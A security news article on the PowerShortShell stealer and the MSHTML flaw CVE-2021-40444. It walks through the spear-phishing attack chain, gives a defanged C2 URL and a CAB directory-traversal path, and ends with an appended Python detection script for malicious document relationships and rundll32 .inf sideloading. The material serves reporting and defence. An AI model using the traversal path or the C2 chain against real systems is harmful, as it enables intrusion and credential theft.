Hackers take advantage of Microsoft’s MSHTML bug to steal Google and Instagram credentials

news

A new PowerShell-based stealer called PowerShortShell is being used to steal Google and Instagram credentials from Farsi-speaking targets around the world, according to security researchers at SafeBreach Labs. Here is what we learned.

https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/

It appears that this information stealer is also being used to monitor Telegram, collecting system information from compromised devices and sending it, along with the stolen credentials, to a server controlled by the attackers.

This attack (publicly reported by Shadow Chaser Group on Twitter in September) started with a spear-phishing email in July.

These attacks target Windows users with malicious Winword attachments that exploit a remote code execution (RCE) bug in Microsoft MSHTML, tracked as CVE-2021-40444.

https://www.bleepingcomputer.com/tag/cve-2021-40444/

The PowerShortShell stealer payload is executed by a DLL that is downloaded to the infected system. Once launched, the PowerShell script starts collecting data and screen snapshots and sends the data to the attacker’s command and control server.

It appears that almost half of the victims reside in the United States. Based on the content of the Microsoft Word document (which blames the Iranian leadership) and the nature of the data collected, it is speculated that the victims are Iranians living abroad who may be viewed as a threat to the Islamic regime in Iran, and that the adversary may be tied to that regime.

The CVE-2021-40444 RCE bug in IE’s MSHTML rendering engine was exploited in the wild as a zero-day vulnerability for more than two weeks before Microsoft issued a security advisory with a partial workaround.

Most recently, it was used by the Magniber ransomware gang, in conjunction with malicious advertisements, to infect targets with malware and encrypt their devices.

In addition, according to Microsoft, several threat groups, including ransomware affiliates, used maliciously crafted Office documents delivered in phishing attacks to exploit this Windows MSHTML RCE bug.

These attacks used the CVE-2021-40444 flaw “as part of an initial access campaign to distribute a custom Cobalt Strike Beacon loader.”

The distributed beacons communicated with malicious infrastructure associated with several cybercrime campaigns, including human-operated ransomware.

CVE-2021-40444 attack chain

It is not surprising that more and more attackers are taking advantage of the CVE-2021-40444 vulnerability. This is because even before the bug was patched, threat actors were sharing tutorials and proof-of-concept exploits on hacking forums.

This leads us to believe that other threat actors or groups have launched attacks that take advantage of this security flaw.

The information shared on the Internet is simple and anyone can easily create a working version of the CVE-2021-40444 exploit. This includes a Python server that can distribute malicious documents and CAB files to infected systems.

Using this information, we were able to successfully reproduce the exploit in about 15 minutes, as shown in this video demo.

Outline of the attack

The following steps describe the CVE-2021-40444 exploit chain.

Step 1

The attack starts by sending a spear phishing email (WinWord attachment) that the victim is lured into opening.

Step 2

The Word file connects to the malicious server, runs the malicious HTML, and drops the DLL into the %temp% directory.

The relationship stored in the document.xml.rels XML file points to the malicious HTML on the C2 server: mshtml:http://hr[.]dedyn[.]io/image.html.

The JScript in the HTML contains an object pointing to the CAB file and an iframe pointing to the INF file, prefixed with a “.cpl:” directive.

The CAB file is opened, and a directory traversal vulnerability in CAB handling allows the attacker to save the msword.inf file into %TEMP%.

Step 3

The malicious DLL executes the PowerShell script.

The INF file is opened via the “.cpl:” directive and sideloaded through rundll32. Example: “.cpl:../../../../Temp/Low/msword.inf”.

Msword.inf downloads the DLL, which executes the final payload (the PowerShell script).

The PowerShell script collects data and exfiltrates it to the attacker’s C2 server.
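A defender-side triage check for the two on-disk artifacts in the chain above (the external relationship in document.xml.rels and the rundll32 sideload of an .inf from %TEMP%), added here as an example; it is not code from the article or from SafeBreach. The host name, file paths and command lines are constructed placeholders, and matching the mhtml: scheme alongside mshtml: is an assumption.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# rundll32 loading an .inf out of a Temp directory: the sideload pattern in Step 3.
RUNDLL32_INF = re.compile(r"(?i)rundll32(?:\.exe)?\b.*\\Temp\\.*\.inf")

def suspicious_rels(docx_bytes: bytes) -> list:
    """Return external relationship targets in word/_rels/document.xml.rels
    whose scheme is mshtml: (as the article writes it) or mhtml: (assumption)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/_rels/document.xml.rels" not in z.namelist():
            return hits
        root = ET.fromstring(z.read("word/_rels/document.xml.rels"))
    for rel in root.iter(REL_NS + "Relationship"):
        target = rel.get("Target", "")
        if rel.get("TargetMode") == "External" and re.match(r"(?i)ms?html:", target):
            hits.append(target)
    return hits

def suspicious_rundll32(cmdline: str) -> bool:
    """True when a process command line shows rundll32 loading an .inf from Temp."""
    return RUNDLL32_INF.search(cmdline) is not None

def build_docx(rels_xml: str) -> bytes:
    """Constructed minimal .docx containing only the part this check reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()

# Constructed sample: one external oleObject relationship with the mshtml:
# scheme (placeholder host, not the real C2) next to a benign hyperlink.
SAMPLE_RELS = (
    f'<Relationships xmlns="{REL_NS[1:-1]}">'
    f'<Relationship Id="rId5" Type="{OLE_TYPE}" TargetMode="External"'
    ' Target="mshtml:http://c2.example.invalid/image.html"/>'
    '<Relationship Id="rId6" Type="hyperlink" Target="https://www.example.com/" TargetMode="External"/>'
    "</Relationships>"
)

# Constructed sample process command lines (e.g. from Sysmon Event ID 1).
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\rundll32.exe" C:\Users\victim\AppData\Local\Temp\Low\msword.inf,Entry',
    r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL desk.cpl',
]
```

Run `suspicious_rels(build_docx(SAMPLE_RELS))` against real .docx bytes read from disk, and feed `suspicious_rundll32` the CommandLine field of process-creation events.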
